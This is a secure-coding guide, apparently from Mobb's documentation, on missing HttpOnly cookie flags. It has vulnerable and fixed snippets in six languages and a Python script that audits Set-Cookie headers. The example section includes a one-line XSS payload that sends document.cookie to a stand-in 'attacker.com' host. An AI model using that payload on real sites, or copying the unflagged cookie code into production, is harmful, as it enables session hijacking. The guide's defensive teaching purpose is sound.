# HttpOnly Cookie Vulnerabilities

#### Tools recognizing this:

<kbd>Opengrep</kbd> <kbd>Fortify</kbd> <kbd>Checkmarx</kbd> <kbd>SonarQube</kbd> <kbd>Snyk</kbd> <kbd>Semgrep</kbd> <kbd>CodeQL</kbd>

## What is HttpOnly Cookie and Why is it Important?

The HttpOnly flag is a security feature that helps prevent client-side access to cookie data through JavaScript. When a cookie is set with the HttpOnly flag, it becomes inaccessible to client-side scripting languages like JavaScript, helping protect against Cross-Site Scripting (XSS) attacks.

Without the HttpOnly flag, cookies are vulnerable to:

* Theft through XSS attacks
* Session hijacking
* Unauthorized access to sensitive cookie data
* Client-side manipulation of cookie values

This guide covers HttpOnly cookie vulnerabilities, examples, prevention methods, and how to properly secure cookies in your applications.

## One Simple HttpOnly Cookie Vulnerability Example

Consider this basic example of setting a cookie:

{% code overflow="wrap" %}

```java
Cookie cookie = new Cookie("sessionId", sessionValue);
response.addCookie(cookie);
```

{% endcode %}

An attacker exploiting an XSS vulnerability could steal this cookie using JavaScript:

<mark style="color:red;">`<script>fetch('https://attacker.com?cookie='+document.cookie)</script>`</mark>

The cookie data would be accessible because the HttpOnly flag is not set, allowing the attacker to hijack the user's session.

## HttpOnly Cookie Prevention Methods: How to Fix Your Code

The most effective way to fix HttpOnly cookie vulnerabilities is to explicitly set the HttpOnly flag when creating cookies. This ensures that the cookie cannot be accessed through client-side scripts, providing an additional layer of security against XSS attacks.

### Code Samples

{% tabs %}
{% tab title="Java" %}
**Vulnerable Code**

<pre class="language-java"><code class="lang-java">Cookie cookie = new Cookie("sessionId", sessionValue);
<a data-footnote-ref href="#user-content-fn-1">response.addCookie(cookie);</a>
</code></pre>

**Fixed Code**

```java
Cookie cookie = new Cookie("sessionId", sessionValue);
cookie.setHttpOnly(true);
response.addCookie(cookie);
```

**Fix Explanation**

The vulnerable code creates a cookie without the HttpOnly flag. The fix explicitly sets the flag with `setHttpOnly(true)`, which prevents JavaScript access to the cookie and makes it more resistant to XSS attacks.
{% endtab %}

{% tab title="JavaScript" %}
**Vulnerable Code**

```javascript
res.cookie('sessionId', sessionValue, {
    secure: true,
    maxAge: 3600000
});
```

**Fixed Code**

```javascript
res.cookie('sessionId', sessionValue, {
    secure: true,
    httpOnly: true,
    maxAge: 3600000
});
```

**Fix Explanation**

The vulnerable code sets a cookie without the HttpOnly flag. The fix adds the `httpOnly` option to the cookie configuration, which prevents client-side JavaScript from accessing the cookie and makes it more secure against XSS attacks.
{% endtab %}

{% tab title="Python" %}
**Vulnerable Code**

```python
response.set_cookie('sessionId', session_value,
    secure=True,
    max_age=3600
)
```

**Fixed Code**

```python
response.set_cookie('sessionId', session_value,
    secure=True,
    httponly=True,
    max_age=3600
)
```

**Fix Explanation**

The vulnerable code creates a cookie without the HttpOnly flag. The fix adds the `httponly` parameter set to `True`, which prevents JavaScript from accessing the cookie and protects it against client-side script access.
{% endtab %}

{% tab title="C#" %}
**Vulnerable Code**

```csharp
HttpCookie cookie = new HttpCookie("sessionId", sessionValue);
Response.Cookies.Add(cookie);
```

**Fixed Code**

```csharp
HttpCookie cookie = new HttpCookie("sessionId", sessionValue);
cookie.HttpOnly = true;
Response.Cookies.Add(cookie);
```

**Fix Explanation**

The vulnerable code creates a cookie without the HttpOnly property. The fix sets the `HttpOnly` property to `true`, which prevents client-side access to the cookie and makes it more secure against XSS attacks.
{% endtab %}

{% tab title="PHP" %}
**Vulnerable Code**

```php
setcookie("sessionId", $sessionValue,
    time() + 3600,
    "/",
    "example.com",
    true
);
```

**Fixed Code**

```php
setcookie("sessionId", $sessionValue,
    time() + 3600,
    "/",
    "example.com",
    true,
    true
);
```

**Fix Explanation**

The vulnerable code sets a cookie without the HttpOnly flag. The fix adds `true` as the last parameter (`httponly`) to enable HttpOnly, which prevents JavaScript access to the cookie and protects it against client-side access.
{% endtab %}

{% tab title="Ruby" %}
**Vulnerable Code**

```ruby
cookies[:session_id] = {
  value: session_value,
  expires: 1.hour.from_now,
  secure: true
}
```

**Fixed Code**

```ruby
cookies[:session_id] = {
  value: session_value,
  expires: 1.hour.from_now,
  secure: true,
  httponly: true
}
```

**Fix Explanation**

The vulnerable code creates a cookie without the HttpOnly flag. The fix adds the `httponly: true` option to the cookie, which prevents JavaScript from accessing the cookie and makes it more secure against XSS attacks.
{% endtab %}
{% endtabs %}
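Each fix above changes what the server emits in its `Set-Cookie` header, so the quickest way to confirm a fix landed (or to find cookies still missing it) is to inspect those headers. The following audit script is an added example, not part of this guide or of Mobb's tooling: it parses `Set-Cookie` values and reports cookies that lack `HttpOnly` (and `Secure`). The `SESSION_NAME_PATTERN` heuristic and the `SAMPLE_HEADERS` are constructed for the example.

```python
import re

# Heuristic (constructed): cookie names that usually carry a session identifier.
SESSION_NAME_PATTERN = re.compile(r"sess|sid|auth|token|jwt", re.IGNORECASE)


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, attributes).

    Attribute keys are lower-cased; flag attributes such as HttpOnly
    and Secure, which carry no value, map to True.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attributes = {}
    for part in parts[1:]:
        if part:
            key, _, attr_value = part.partition("=")
            attributes[key.strip().lower()] = attr_value.strip() or True
    return name.strip(), value, attributes


def audit_set_cookie(header_value):
    """Return findings for one Set-Cookie value as (name, severity, issue) tuples."""
    name, _, attributes = parse_set_cookie(header_value)
    findings = []
    if "httponly" not in attributes:
        # Without HttpOnly, document.cookie exposes the value to any injected
        # script, so a session-bearing cookie is the high-severity case.
        severity = "high" if SESSION_NAME_PATTERN.search(name) else "medium"
        findings.append((name, severity, "missing HttpOnly"))
    if "secure" not in attributes:
        findings.append((name, "medium", "missing Secure"))
    return findings


def audit_response_headers(headers):
    """Audit every Set-Cookie header in a list of (header_name, header_value) pairs."""
    return [f for h, v in headers if h.lower() == "set-cookie" for f in audit_set_cookie(v)]


# Constructed sample headers: the first cookie mirrors the vulnerable samples
# above, the second mirrors the fixed samples, the third is a non-session cookie.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionId=abc123; Secure; Max-Age=3600; Path=/"),
    ("Set-Cookie", "sessionId=abc123; Secure; HttpOnly; Max-Age=3600; Path=/"),
    ("Set-Cookie", "theme=dark; Path=/"),
]

if __name__ == "__main__":
    for name, severity, issue in audit_response_headers(SAMPLE_HEADERS):
        print(f"[{severity}] cookie {name!r}: {issue}")
```

Run it against the headers of a real response (for example, the output of `curl -i`) to check that every session cookie is emitted with both flags.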

## Need more help in preventing HttpOnly Cookie vulnerabilities?

[Mobb](https://mobb.ai) supports fixing many forms of HttpOnly Cookie vulnerabilities, and can mitigate your issues in batch.

Start now for free at [app.mobb.ai](https://app.mobb.ai)

### We'd love your feedback!

We're excited to hear your thoughts and ideas about fixing vulnerabilities.

[Book a meeting](https://calendly.com/mobbai/demo) or [Contact us](https://content.mobb.ai/contact) if you have any corrections, questions or suggestions. Start now for free at <https://app.mobb.ai>

[^1]: This is the vulnerable part
